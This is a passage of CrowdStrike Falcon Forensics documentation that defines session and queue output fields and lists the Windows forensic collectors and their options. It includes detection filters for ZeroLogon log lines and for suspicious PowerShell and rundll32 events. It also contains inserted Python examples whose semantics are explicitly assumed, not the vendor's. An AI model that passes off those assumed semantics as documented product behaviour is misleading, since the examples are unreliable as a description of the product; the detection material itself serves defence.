session_deleted_at Gets populated if that session has been manually deleted, the session has fully completed, or 7 days passed after the session was created and the target device never came online (leading to queue time expiration). When a session has completed, it will show a session_status of FINISHED.
session_updated_at Gets updated as you add additional commands to a session, or if the device comes online and begins the session and processes associated commands.
command_complete This is for each individual command. Processed commands will have a status of TRUE. This does not indicate success, only that the command was executed.
command_deleted_at Only gets populated if someone chooses to delete a specific command that was called for a given session.
base_command and command_string These correlate to each other. The base_command displays the specific command, while the command_string shows the base_command plus any additional parameters.
command_status Provides the status of a given command. When a command is queued up, it will show INITIALIZED. When it has been processed and completed, it will display FINISHED.
Note: If a command has a command_deleted_at value, the command_status value might no longer be reliable.

For new sessions (that is, Invoke-FalconDeploy was run and then Get-FalconQueue was run), when you immediately open the FalconQueue CSV you should see the following:

  • session_status of PENDING

  • command_complete of FALSE

  • Unique cloud_request_ids

  • command_deleted_at information will only show if someone chose to delete a specific command in a session

  • base_command of “put”

    • associated command_string of “put <executable name>”

  • base_command of “run”

    • associated command_string of “run <executable name>”

  • command_status of INITIALIZED

FFC_Reg_Values.csv

This file contains information from only one command being run and verifies the executable has finished running on a given host and that it has completed successfully. You can use the information in this file to help troubleshoot why a computer is not successfully completing a Falcon Forensics scan.

Field Definition
session_id The individual session for a device id (aid).
stdout

When the command is successful, or the complete status shows TRUE, you will get stdout (standard output) information. Expand this cell to view all of the information contained in it.

  • ExitCode value of 0 means the executable has successfully run.

  • If you do not get an ExitCode of 0, you can reference the Exit Codes on pages 18-20 to learn more about what the shown exit code means.

  • The Start and Stop information captures when it started to run and when it stopped running.

  • CU is equivalent to your CID. UploadCount should be 1.

  • Uploaded should display a time so that you know data was collected and uploaded.

Falcon Forensics Collectors

Learn how to configure collectors in Falcon Forensics.

Overview

A configuration is a collection profile that gathers specific artifacts on Windows, Mac, and Linux platforms. A configuration contains settings and specifies one or more collectors. A collector is an executable script package that defines the data that will be collected.

This page lists all available collectors. It also details generated events, default settings, configurable options, and examples.

Get started

If you are a new Falcon Forensics customer, you can start creating collections and configurations immediately. Existing customers must choose to opt in to use customizable collections.

  1. Go to Endpoint security > Forensics > Forensics Collections.

  2. Click Create collection.

  3. In the Opt-in notification, type OPT-IN into the text box. Then click Opt-in.

Note: Existing customers can choose to opt in or opt out for the next 90 days. On Tuesday, December 9, 2025, all customers will be automatically opted in to the new collections and Forensics executable behaviors.

For info related to opting in to customizable collections, creating collections, and creating configurations, see the following.

Windows collectors

About file operations

When configuring Windows collections that involve file operations, it is important to understand the purpose of each available option. Some options are mutually exclusive. This is a multi-select field.

Standard file information

  • NAME: The file's name.

  • SIZE: The file's size in bytes.

  • ATTRIBUTES: The file's attributes.

Timestamp and identifier information

  • CAM: The times the file was created, accessed, and modified.

  • FILEID: A unique file identifier, combining volume ID and file ID.

  • INDX: NTFS INDX buffer timestamps (specifically, FILE_NAME MACB).

  • MFT: NTFS MFT FILE record timestamps (FILE_NAME and STANDARD_INFORMATION MACB).

  • XACCESSED: Excludes the last accessed timestamp from collection.

Security and ownership details

  • CERTS: Reports and validates digital certificates.

  • PECERTS: Reports and validates digital certificates only for Portable Executable (PE) files.

  • OWNER: The account name of the file's owner.

  • SID: The Security Identifier (SID) of the file’s owner.

  • XGOODCERTS: Excludes files that have correct digital signatures.

File property and hashing

  • PROPERTIES: Collects file properties, such as version and company information.

  • MD5: Collects the MD5 hash of the file.

  • SHA1: Collects the SHA1 hash of the file.

  • SHA256: Collects the SHA256 hash of the file.

Behavioral and exclusion options

  • PEONLY: This option ensures that file operations are skipped if the file is not in PE format.

  • PRIVBACKUP: Enables or revokes SeBackupPrivilege during the collection process.

  • XDIR: Excludes directories from the collection.

  • XFILE: Excludes non-directories from the collection. Only directories are collected.

  • XOFFLINE: Ignores files whose attributes indicate that the data isn't immediately available. For example:

    • FILE_ATTRIBUTE_OFFLINE

    • FILE_ATTRIBUTE_RECALL_ON_DATA_ACCESS

    • FILE_ATTRIBUTE_RECALL_ON_OPEN

  • XREPARSE: Ignores files with the FILE_ATTRIBUTE_REPARSE_POINT attribute.

  • XSPARSE: Ignores files with the FILE_ATTRIBUTE_SPARSE attribute.

  • XUNC: Ignores UNC network share paths. This does not apply to long paths or NT extended paths.

Important considerations
  • Mutual exclusivity: The XDIR and XFILE options are mutually exclusive. Using both simultaneously results in no data being collected by that particular collector.

  • Performance impact: The following options involve reading directly from the file, which may increase collection time: CERTS, FILEID, INDX, MFT, OWNER, PECERTS, PEONLY, PROPERTIES, MD5, SHA1, SHA256, SID, XGOODCERTS.

  • FfcFileIdentifier generation: For FfcFileIdentifier to be generated, you must turn on FILEID.

ADS

Collects information about Alternate Data Streams (ADS) in files with customizable filtering, recursion options, and detailed file attributes. This collector is not in the default configuration.

Events generated

FileInfo: Details about the file.

FileTimestampMetadata: File time event per timestamp for a given file used to build a timeline of creation, access, and modification of a file.

SignInfo: Information about the signing state of an image.

Configurable options
Option Type Description In default configuration?
Path String The directory path you need to scan. No
File Operations Multiple selection The file operations to include in this collection. No
Exclude Filter Regex Path exclusion regex filter pattern. No
Include Filter Regex Path inclusion regex filter pattern. No
Avoidance Filter Regex Excludes specified paths from processing. Any directory matching this filter will be skipped entirely during collection. No
Amcache

Amcache registry hive entry, which contains metadata related to Windows Portable Executable (PE) binary image execution and program installation.

Events generated

AmcacheEntry: Metadata related to PE execution and program installation on Windows 7 and Server 2008 R2 and later.

Configurable options
Option Type Description In default configuration?
Path String The directory path to scan. No
File Operations Multiselect The file operations to include in this collection. Yes. Default: all,xoffline,xreparse,xsparse

Exclude Zero Size Files Boolean Only record files with non-zero size No
Skip Hashing Above Size Integer Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB. Yes. Default: 20MB

Skip Hashing Below Size Integer Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
BAM

Gathers Background Activity Moderator (BAM) registry entry.

Events generated

BamRegAppRunTime: Recent program execution timeline from Background Activity Moderator (BAM) system service registry. BAM key is written on system shutdown.

RecentExecutionTimestamp: Recent execution timestamp from a Forensics artifact.

Configurable options
Option Type Description In default configuration?
File Operations Multiple selection The file operations to include in this collection. Yes. Default: attributes, cam, certs, fileid, name, owner, privbackup, properties, sha1, sha256, sid, size, xoffline, xreparse

Skip Hashing Above Size Integer Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
Skip Hashing Below Size Integer Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
BITS

Gathers information from the Windows Background Intelligent Transfer Service (BITS).

Events generated

BITSJobInfo: Background Intelligent Transfer Service (BITS) job information.

BITSJobFileInfo: Background Intelligent Transfer Service (BITS) job file information.

BITSJobMetadata: Background Intelligent Transfer Service (BITS) job metadata, such as times, proxy.

Configurable options
Option Type Description In default configuration?
Path String The directory path to scan. No
File Mask String Specify which files to include in the collection, using wildcards. For example, *.exe, log*.txt. No
File Operations Multiple selection The file operations to include in this collection. No
Browser

Gathers browser-based artifacts.

Events generated

BrowserCookieInfo: Browser tracking cookie information.

BrowserDownloadStart: Browser downloaded file information signifying download start time.

BrowserDownloadEnd: Browser downloaded file information signifying download end time.

BrowserExtensionInfo: Browser extension or browser add-on information.

BrowserHistoryVisit: Information about a browser history entry.

Configurable options
Option Type Description In default configuration?
Browser type Multiselect Browsers that will be parsed by this collector. Yes. Default: All
Maximum entries Integer Maximum number of records collected per browser, per event. Yes. Default: 1,000

After date Date Only gathers records after the set date. No
Days to include Integer Number of days to look back. No
Ascending order Boolean Gather results in ascending order instead of descending. No
Copy database Boolean Make a temporary copy of the browser database. This can avoid an issue with the database being locked if the browser is open. No
Exclude non-HTTP URLs Boolean For Internet Explorer 10 and 11, exclude non-HTTP URLs. No
Exclude web data Boolean For Internet Explorer 10 and 11, exclude HTTP and HTTPS URLs from history. No
Only servers Boolean Restrict collection to only include servers and domain controllers. No
DataStore

Processes Windows Update history stored in the DataStore.edb file.

Events generated

OsUpdateTimestamp: Details about an operating system update.

Configurable options
Option Type Description In default configuration?
Path String The directory path to scan. No. Collector defaults to %SystemRoot%\SoftwareDistribution\DataStore
File Mask String Specify which files to include in the collection, using wildcards. For example, *.exe, log*.txt. No. Collector defaults to *.*

File Operations Multiple selection The file operations to include in this collection. No
Page Size Integer Use provided ESE Jet database engine page size (bytes), instead of default. No
Defender

Pulls Defender threat and detection details, and also gathers DirList-related events for the detected and threat files.

Events generated

MpThreat: Microsoft Protection Threat, information about the threat identified by Defender.

MpThreatDetection: A detection from the Microsoft Protection, also known as Defender.

MpThreatAction: Report when a particular threat action type has occurred.

FileInfo: Details about the file.

FileTimestampMetadata: File time event per timestamp for a given file used to build a timeline of creation, access, and modification of a file.

SignInfo: Information about the signing state of an image.

Configurable options
Option Type Description In default configuration?
Path String The directory path to scan. No
Collect Detection History Boolean Enables collection of Windows Defender detection history. No
File Mask String Specify which files to include in the collection, using wildcards. For example, *.exe, log*.txt. No. Collector defaults to *.*
File Operations Multiple selection The file operations to include in this collection. Yes. Default: attributes, cam, fileid, name, owner, privbackup, sha1, sha256, sid, size, xoffline, xreparse, xsparse

DefenderWMI

Collect Windows Defender generated threats and detections using WMI queries.

Events generated

FileInfo: Details about the file.

FileTimestampMetadata: File time event per timestamp for a given file used to build a timeline of creation, access, and modification of a file.

MpThreatWMI: Microsoft Protection Threat, information about the threat identified by Defender, gathered using WMI.

MpThreatDetectionWMI: A detection from the Microsoft Protection, also known as Defender, gathered using WMI.

MpThreatAction: Report when a particular threat action type has occurred.

Configurable options

Option Type Description In default configuration?
File Operations MultiSelect File operations to include in this collection. Yes. Default: attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse

DirList

Collects a list of files and sub-directories and provides details about each file.

Events generated

FileInfo: Details about the file.

FileTimestampMetadata: File time event per timestamp for a given file used to build a timeline of creation, access, and modification of a file.

SignInfo: Information about the signing state of an image.

Configurable options
Option Type Description In default configuration?
Path String The directory path to scan. No. Collector defaults to %systemdrive%

Include details of initial directory Boolean Includes detailed information about the starting directory. No
Scan All Drives Boolean Enumerate all fixed drives and substitute each in <path>. No
Maximum Entries Integer Maximum number of entries to collect. Yes. Default: 500,000 for non-portable executables, 100,000 for portable executables
File Operations Multiple selection The file operations to include in this collection. Yes. Default: attributes, cam, fileid, name, owner, privbackup, sha1, sha256, sid, size, xoffline, xreparse, xsparse
Exclude Filter String Regular expression pattern for excluding paths. Yes. Default: the non-portable executable collector uses "\.(exe

Include Filter String Regular expression pattern for including paths. No
Avoidance Filter String Excludes specified paths and their subdirectories from processing. Any directory matching this filter will be skipped entirely during collection. No
File Mask String Specify which files to include in the collection, using wildcards. For example, *.exe, log*.txt. No. Collector defaults to *.*

Recursive Listing Boolean Enables recursive directory scanning. Yes
Recursion Depth Integer Integer denotes recursion depth. For example: 0 = top level only; 1 = 1 level down; 2 = 2 levels down. Yes. Default: 15

Disable Symbolic Links Boolean Prevents following symbolic links during collection. No
Include Top-Level Directory Details Boolean Includes detailed information about top-level directories. No
Skip Hashing Above Size String Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB. Yes. Default: 5 for non-portable executables, 20 for portable executables

Skip Hashing Below Size String Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
Drives

Generates a list of all disks and the FsVolumeMounted event.

Events generated

FsVolumeMounted: Information about a volume that was just mounted.

Drivers

Provides information about driver files.

Events generated

DriverLoad: Information on a loaded driver.

Configurable options
Option Type Description In default configuration?
File Operations Multiple selection The file operations to include in this collection. Yes. Default: attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse
Skip Hashing Above Size String Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB. Yes. Default: 20MB

Skip Hashing Below Size String Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
Env

Collects information about all system variables and current user variables.

Events generated

RuntimeEnvironmentVariable: In the context of Falcon Forensics, this is an environment variable provided to the collector process itself.

Events

Collects events from Windows Event logs.

Events generated

LogEntry: Information about a log entry observed on an endpoint.

Configurable options
Option Type Description In default configuration?
Process Application event log Boolean Enables collection from Application event log. Yes
Process Security event log Boolean Enables collection from Security event log. Yes
Process System event log Boolean Enables collection from System event log. Yes
Custom Log Name String Specify additional event logs to collect. Yes. See Default configuration collection examples.
Filter Expression String Use logical expressions to filter event messages. Yes. See Default configuration collection examples.
Exclude Full Text Boolean Excludes full message text from collection. No
Help Tag String Help tag that describes the event filter. Yes. See Default configuration collection examples.

Event ID Mask Integer Filter for specific Event IDs. Yes
Maximum Entries Integer Maximum number of events to collect. Yes. Default: 5000
Days to Report Integer Number of days of events to collect. Yes. Default: 1825

Event Source String Filter events by specific source. No
Output Name/Value Pairs Boolean Outputs event data in name or value pair format. Yes
Before Date Date Collect events before specified date (mm/dd/yyyy). No
After Date Date Collect events after specified date (mm/dd/yyyy). No
Default configuration collection examples

Antivirus events

Option Value
Custom Log Name %windir%\System32\winevt\Logs\Symantec Endpoint Protection Client.evtx
Filter Expression (EVENTID==51 or EVENTID==45)
Help Tag AV
Option Value
Custom Log Name %windir%\System32\winevt\Logs\Microsoft-Windows-Windows Defender%4Operational.evtx
Filter Expression EVENTID==3004
Help Tag AV

Remote Desktop Protocol (RDP) events

Option Value
Custom Log Name %windir%\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx
Filter Expression (EVENTID==21 or EVENTID==22 or EVENTID==24 or EVENTID==1101 or EVENTID==23 or EVENTID==25)
Help Tag RDP
Option Value
Custom Log Name %windir%\System32\winevt\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx
Filter Expression EVENTID==1158
Help Tag RDP

Task scheduler events

Option Value
Custom Log Name %windir%\System32\winevt\Logs\Microsoft-Windows-TaskScheduler%4Operational.evtx
Filter Expression (EVENTID==106 or EVENTID==200 or EVENTID==102 or EVENTID==141 or EVENTID==201) and (TEXT like '\At')
Help Tag TaskScheduler

PowerShell events

Option Value
Custom Log Name %windir%\System32\Winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx
Filter Expression (EVENTID==4104 and LEVEL eq 'WARNING')
Help Tag PowerShell
Option Value
Custom Log Name %windir%\System32\Winevt\Logs\Windows Powershell.evtx
Filter Expression (EVENTID==400 or EVENTID==403 or EVENTID==600) AND ('rundll32' in TEXT OR 'powershell' in TEXT)
Help Tag PowerShell
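The Filter Expression values above use a small expression language (EVENTID==n, LEVEL eq '...', TEXT like '...', '...' in TEXT, and/or, parentheses). As an added example that is not CrowdStrike's code, the following Python evaluates those expressions over constructed event records so you can check which events a default filter would keep; the exact semantics of eq, like and in are assumed (case-insensitive exact match and substring match respectively).

```python
import re

_TOKEN = re.compile(r"\s*(?:(==|[()])|'([^']*)'|(\d+)|([A-Za-z_]\w*)|(\S))")  # lexer


def tokenize(expression):
    tokens = []
    for m in _TOKEN.finditer(expression):
        punct, string, number, word, bad = m.groups()
        if bad is not None:
            raise ValueError(f"unexpected character {bad!r} at offset {m.start(5)}")
        if punct:
            tokens.append((punct, None))
        elif string is not None:
            tokens.append(("str", string))
        elif number is not None:
            tokens.append(("num", int(number)))
        elif word.lower() in ("and", "or", "eq", "like", "in"):   # keywords, any case
            tokens.append((word.lower(), None))
        else:
            tokens.append(("field", word.upper()))                 # EVENTID, LEVEL, TEXT
    return tokens


class _Parser:
    # Recursive descent: OR binds loosest, then AND, then a parenthesised group or one comparison.
    def __init__(self, tokens):
        self.tokens, self.i = tokens, 0
    def peek(self):
        return self.tokens[self.i] if self.i < len(self.tokens) else (None, None)
    def take(self, kind=None):
        tok = self.peek()
        if kind is not None and tok[0] != kind:
            raise ValueError(f"expected {kind!r}, got {tok!r}")
        self.i += 1
        return tok
    def _binary(self, op, operand):
        node = operand()
        while self.peek()[0] == op:
            self.take()
            node = (op, node, operand())
        return node
    def expr(self):
        return self._binary("or", self.term)
    def term(self):
        return self._binary("and", self.factor)
    def factor(self):
        kind, value = self.peek()
        if kind == "(":
            self.take()
            node = self.expr()
            self.take(")")
            return node
        if kind == "str":                   # 'needle' in TEXT
            self.take()
            self.take("in")
            return ("in", self.take("field")[1], value)
        field = self.take("field")[1]
        op = self.take()[0]
        if op == "==":                      # EVENTID==4104
            return ("==", field, self.take("num")[1])
        if op in ("eq", "like"):            # LEVEL eq 'WARNING', TEXT like '\At'
            return (op, field, self.take("str")[1])
        raise ValueError(f"unsupported operator {op!r} after {field}")


def _evaluate(node, event):
    op = node[0]
    if op in ("or", "and"):
        left, right = _evaluate(node[1], event), _evaluate(node[2], event)
        return (left or right) if op == "or" else (left and right)
    value = event.get(node[1])
    if value is None:                       # field absent from the record: comparison is false
        return False
    if op == "==":
        return int(value) == node[2]
    text, needle = str(value).lower(), node[2].lower()
    # Assumption: 'eq' is a case-insensitive exact match; 'like' and 'in' are substring matches.
    return text == needle if op == "eq" else needle in text


def compile_filter(expression):
    """Turn a Filter Expression string into a predicate over an event dict."""
    parser = _Parser(tokenize(expression))
    tree = parser.expr()
    if parser.peek()[0] is not None:
        raise ValueError(f"trailing tokens: {parser.tokens[parser.i:]!r}")
    return lambda event: _evaluate(tree, event)


# Filter Expression values copied from the default configuration examples above.
DEFAULT_FILTERS = {
    "TaskScheduler": r"(EVENTID==106 or EVENTID==200 or EVENTID==102 or EVENTID==141 or EVENTID==201) and (TEXT like '\At')",
    "PowerShell operational": "(EVENTID==4104 and LEVEL eq 'WARNING')",
    "Windows PowerShell": "(EVENTID==400 or EVENTID==403 or EVENTID==600) AND ('rundll32' in TEXT OR 'powershell' in TEXT)",
}

# Constructed event records: field names match the expressions, the TEXT values are made up.
SAMPLE_EVENTS = [
    {"label": "ps-4104-warning", "EVENTID": 4104, "LEVEL": "Warning", "TEXT": "Creating Scriptblock text (1 of 1)"},
    {"label": "ps-4104-verbose", "EVENTID": 4104, "LEVEL": "Verbose", "TEXT": "Creating Scriptblock text (1 of 1)"},
    {"label": "ps-400-rundll32", "EVENTID": 400, "LEVEL": "Information", "TEXT": "Engine state changed. HostApplication=rundll32.exe"},
    {"label": "task-106-at", "EVENTID": 106, "LEVEL": "Information", "TEXT": r'User registered task "\At1"'},
    {"label": "task-106-backup", "EVENTID": 106, "LEVEL": "Information", "TEXT": r'User registered task "\Backup"'},
]
```

Running each DEFAULT_FILTERS entry over SAMPLE_EVENTS keeps exactly ps-4104-warning, ps-400-rundll32 and task-106-at respectively.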
FeatureUsage

Collects data from Windows 10 and 11 Feature Usage registry keys.

Events generated

RegFeatureUsageInfo: Information about Feature Usage registry keys, with details per user and last login/last write timestamps. This is collected alongside DirList-related events.

Configurable options
Option Type Description In default configuration?
Path String The directory path to scan. Environment and app variables are automatically expanded. No
Process Files Modified Within Days Integer Only process files modified within a specified number of days. No
Process Offline Registry Boolean Process offline registry files in addition to live registry. No
Do Not Process Live Registry Boolean Skips the live registry so that only offline registry files are processed. No
File Operations Multiple selection The file operations to include in this collection. Yes. Default: attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse

Skip Hashing Above Size String Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
Skip Hashing Below Size String Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
Files

Collects counts of attribute types, file size distribution, and distributions of timestamp ages.

Events generated

FilesStatisticInfo: Contains information about a file’s statistics. It’s a much less noisy version of Dirlist events and meant to give complementary information.

Configurable options
Option Type Description In default configuration?
Path String The directory path to scan. Environment and app variables are automatically expanded. Cannot be empty. Yes. Default: %systemdrive%

Scan All Drives Boolean Enables scanning of all available drives. Yes
Exclude Filter String Regular expression pattern for excluding paths. No
Include Filter String Regular expression pattern for including paths. No
Avoidance Filter String Excludes specified paths and their subdirectories from processing. Any directory matching this filter will be skipped entirely during collection. No
File Mask String Specify which files to include in the collection, using wildcards. For example, *.exe, log*.txt. No. Collector defaults to *.*

Maximum Extensions Integer Maximum number of file extensions to process. No
Recursion Depth Integer Integer denotes recursion depth. For example: 0 = top level only; 1 = 1 level down; 2 = 2 levels down. No
Recursive Listing Boolean Enables recursive directory scanning. Yes
Disable Symbolic Links Boolean Prevents following symbolic links during collection. Yes
Calculate Raw Extension Statistics Boolean Generates statistics for raw file extensions. Yes
Calculate Filtered Extension Statistics Boolean Generates statistics for filtered file extensions. No
Firewall

Collects Windows host-based firewall rules and their configurations including enabled/disabled status, application names, protocols, ports, and network profiles.

Events generated

FirewallRuleInfo: Contains information about firewall rules created on the host.

Configurable options
Option Type Description In default configuration?
Only Report Disabled Rules Boolean Only report firewall rules that are disabled. No
Only Report Enabled Rules Boolean Only report firewall rules that are enabled. No
Groups

Collect information about Windows user groups and their members from the local system.

Events generated

LocalGroupIdentity: Group identity information includes user group name, GID, names, UIDs, and SID of user members.

Handles

Collects handle IDs, types, and names of running processes.

Events generated

ProcessHandleTableEntry: Information about an entry in the process handle table that references a kernel object.

Configurable options
Option Type Description In default configuration?
Don't report entries that have an empty name Boolean Excludes handles with empty names from the collection. Yes
Process ID Integer Filter collection to a specific process ID number. No
Type String Filter collection by handle type. For example: mutant, file, key. Yes. Default: mutant

Jobs

Collect information about scheduled atjobs including command details, schedule parameters, and status flags.

Events generated

AtJobInfo: Windows atjobs in use.

JumpList

Collects information from an application's JumpList, which are recently opened files.

Events generated

Collects information from an application's JumpList, which are recently opened files.

Configurable options
Option Type Description In default configuration?
Path String The directory path to scan. Environment and app variables are automatically expanded. No. Collector defaults to %profiles%

File Operations Multiple selection The file operations to include in this collection. No
LNK Target File Operations Multiple selection Select specific file operations to perform on LNK target files. No
Use Built-in List Of AppId Names Boolean Use built-in list of AppId names for JumpList identification. No
Scan System Drive For EXE Files Boolean Scan system drive for EXE files and calculate their AppIds for JumpList identification. No
Avoidance Filter String Excludes specified paths and their subdirectories from processing. Any directory matching this filter will be skipped entirely during collection. No
Skip Hashing Above Size String Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
Skip Hashing Below Size String Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
Link

Gives information for each link file and its target file. The target file can be found using DirList-related events.

Events generated

LinkFileInfo: Collects file metadata about link files.

FileInfo: Details about the file.

FileTimestampMetadata: File time event per timestamp for a given file used to build a timeline of creation, access, and modification of a file.

SignInfo: Information about the signing state of an image.

Configurable options
Option Type Description In default configuration?
Path String The directory path to scan. Environment and app variables are automatically expanded. Cannot be empty. Yes. Default: %SystemDrive%
File Operations Multiple selection The file operations to include in this collection. Yes. Default: attributes, cam, certs, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse
LNK Target File Operations Multiple selection The file operations to perform on LNK target files. Yes. Default: fileid

File Mask String Specify which files to include in the collection, using wildcards. For example, *.exe, log*.txt. No
Scan All Drives Boolean Enables scanning of all available drives. No
Exclude Filter String Regular expression pattern for excluding paths. No
Include Filter String Regular expression pattern for including paths. No
Avoidance Filter String Excludes specified paths and their subdirectories from processing. Any directory matching this filter will be skipped entirely during collection. No
Recursive Listing Boolean Enables recursive directory scanning. Yes
Recursion Depth Integer Integer denotes recursion depth. For example: 0 = top level only; 1 = 1 level down; 2 = 2 levels down. Default: 15
Disable Symbolic Links Boolean Prevents following symbolic links during collection. No
Skip Hashing Above Size String Skip hashing files larger than specified size. Default is megabytes, but you can use B, KB, MB, or GB. Yes. Default: 5MB

Skip Hashing Below Size String Skip hashing files smaller than specified size. Default is megabytes, but you can use B, KB, MB, or GB. No
LogFile

Collects data from text log files. Default configuration has multiple different collectors.

Events generated

FileEntry: Text version of warning and error events.

Configurable options
Option Type Description In default configuration?
Path String The directory path to scan. Environment and app variables are automatically expanded. Cannot be empty. Yes: multiple values, see Default configuration examples.
File Mask String Specify which files to include using wildcards. For example, *.exe, log*.txt. Yes: multiple values, see Default configuration examples.
Exclude Filter String Regular expression pattern for excluding paths. No
Include Filter String Regular expression pattern for including paths. No
Avoidance Filter String Excludes specified paths and their subdirectories from processing. Any directory matching this filter will be skipped entirely during collection. No
Recursive Listing Boolean Enables recursive directory scanning. No
Recursion Depth Integer Integer denotes recursion depth. For example: 0 = top level only, 1 = 1 level down, 2 = 2 levels down. No
Disable Symbolic Links Boolean Prevents following symbolic links during collection. No
Days to include Integer Number of days of log data to collect. No
First Lines Integer Number of lines to collect from the beginning of each file. No
Line Inclusion Regex String Regular expression pattern for filtering log lines. No
Format String String Use $[1-9] to reference match groups, #[1-9] for SHA256 hash, *[1-9] for masking. No
Help Tag String Helper tag, can help tag specific logs you're looking for. No
Maximum Entries Integer Maximum number of entries to collect. Default: unlimited. No
Default configuration examples

ZeroLogon detection

Option Value
Path %SystemRoot%\debug\
File Mask netlogon.*
Include Filter \.(log|bak)
Line Inclusion Regex NetrServerAuthenticate.*212fffff
Help Tag ZeroLogon

Windows Defender detection logs

Option Value
Path %ProgramData%\Microsoft\Windows Defender\Support\
File Mask MPDetection-*.log
Line Inclusion Regex DETECTION
Help Tag AV

Option Value
Path %ProgramData%\Microsoft\Windows Defender\Support\
File Mask MPLog-*.log
Line Inclusion Regex DETECTION(_|\w|:)
Help Tag AV

PowerShell history

Option Value
Path %profiles%
Include Filter \AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\
File Mask ConsoleHost_history.txt
Recursive Listing True
Disable Symbolic Links True
Recursion Depth 20
Help Tag PowerShell
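
The ZeroLogon and Defender configurations above are line filters over text logs. As an added example (not CrowdStrike code), the Python below applies those Line Inclusion Regex values to constructed netlogon.log and MPLog lines and demonstrates one reading of the Format String option; the sample lines, the LogFileConfig class and the $n/#n/*n semantics are assumptions, not the collector's implementation.

```python
"""LogFile-style line collection, re-created in Python (added example, not
CrowdStrike code). Applies the page's default Line Inclusion Regex values to
constructed log lines; Format String handling ($n = match group n, #n = SHA256
of group n, *n = group n masked) is our reading of the option description."""
import hashlib
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class LogFileConfig:
    line_inclusion_regex: str               # only lines matching this are collected
    help_tag: str                           # tag copied onto every emitted entry
    format_string: Optional[str] = None     # optional rewrite of the emitted text
    maximum_entries: Optional[int] = None   # stop after this many matches (None = unlimited)


def _expand(fmt: str, match: "re.Match[str]") -> str:
    """Expand $n / #n / *n references against the capture groups of a match."""
    def replace(ref: "re.Match[str]") -> str:
        kind, idx = ref.group(1), int(ref.group(2))
        group = match.group(idx) or ""
        if kind == "$":
            return group
        if kind == "#":
            return hashlib.sha256(group.encode("utf-8")).hexdigest()
        return "*" * len(group)        # "*n": mask the group, keeping its length
    return re.sub(r"([$#*])([1-9])", replace, fmt)


def format_line(line: str, regex: str, fmt: str) -> Optional[str]:
    """Apply one regex + format string to a single line; None if the line does not match."""
    match = re.search(regex, line)
    return _expand(fmt, match) if match else None


def collect_lines(text: str, cfg: LogFileConfig) -> list:
    """Return one FileEntry-like dict per line that passes the inclusion regex."""
    pattern = re.compile(cfg.line_inclusion_regex)
    entries = []
    for number, line in enumerate(text.splitlines(), start=1):
        match = pattern.search(line)
        if not match:
            continue
        entries.append({
            "line": number,
            "help_tag": cfg.help_tag,
            "text": _expand(cfg.format_string, match) if cfg.format_string else line,
        })
        if cfg.maximum_entries is not None and len(entries) >= cfg.maximum_entries:
            break
    return entries


# Default configurations from the tables above.
ZEROLOGON = LogFileConfig(r"NetrServerAuthenticate.*212fffff", "ZeroLogon")
DEFENDER_MPLOG = LogFileConfig(r"DETECTION(_|\w|:)", "AV")

# Constructed sample lines (shaped like netlogon.log / MPLog-*.log, not real captures).
NETLOGON_SAMPLE = "\n".join([
    "09/14 15:23:40 [LOGON] [1324] CORP: NetrServerAuthenticate entered: WS01$ on account WS01$ from \\\\WS01 (negotiated flags 600fffff)",
    "09/14 15:23:41 [LOGON] [1324] CORP: NetrServerAuthenticate entered: DC01$ on account DC01$ from \\\\DC01 (negotiated flags 212fffff)",
    "09/14 15:23:41 [LOGON] [1324] CORP: NetrServerAuthenticate returns 0xC0000022",
    "09/14 15:23:42 [LOGON] [1324] CORP: NetrServerAuthenticate entered: DC01$ on account DC01$ from \\\\DC01 (negotiated flags 212fffff)",
])
MPLOG_SAMPLE = "\n".join([
    "2024-05-01T10:00:00.000Z DETECTION_ADD Trojan:Win32/Constructed file:C:\\Users\\alice\\x.exe",
    "2024-05-01T10:00:01.000Z Engine:version 1.1.24040.1",
    "2024-05-01T10:00:02.000Z DETECTIONEVENT MPSOURCE_REALTIME Trojan:Win32/Constructed",
])


if __name__ == "__main__":
    for entry in collect_lines(NETLOGON_SAMPLE, ZEROLOGON) + collect_lines(MPLOG_SAMPLE, DEFENDER_MPLOG):
        print(entry)
```

Only lines 2 and 4 of the netlogon sample carry the 212fffff negotiation flags and survive the ZeroLogon filter; the Engine line in the MPLog sample is dropped because DETECTION must be followed by an underscore, a word character or a colon. The format string lets a collector emit just the captured field, its hash, or a masked placeholder instead of the whole line.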
Magic

Collects information about files within the file system whose extension does not match their byte signature, for example a file with a DOIUV extension whose header magic identifies it as a PE file.

Events generated

FileSignatureMismatch: On-demand scan for files with name extensions and header magic values.

Configurable options
Option Type Description In default configuration?
Path String The directory path to scan. Environment and app variables are automatically expanded. Cannot be empty. Yes: %SystemDrive%
File Operations Multiple selection The file operations to include in this collection. Yes: attributes, cam, fileid, name, owner, properties, sha1, sha256, sid, size, xoffline, xreparse, xsparse
Scan All Drives Boolean Enables scanning of all available drives. No
Exclude Filter String Regular expression pattern for excluding paths. No
Include Filter String Regular expression pattern for including paths. No
Avoidance Filter String Excludes specified paths and their subdirectories from processing. Any directory matching this filter will be skipped entirely during collection. No
File Mask String Specify which files to include in the collection, using wildcards. For example, *.exe, log*.txt. No
Recursive Listing Boolean Enables recursive directory scanning. Yes
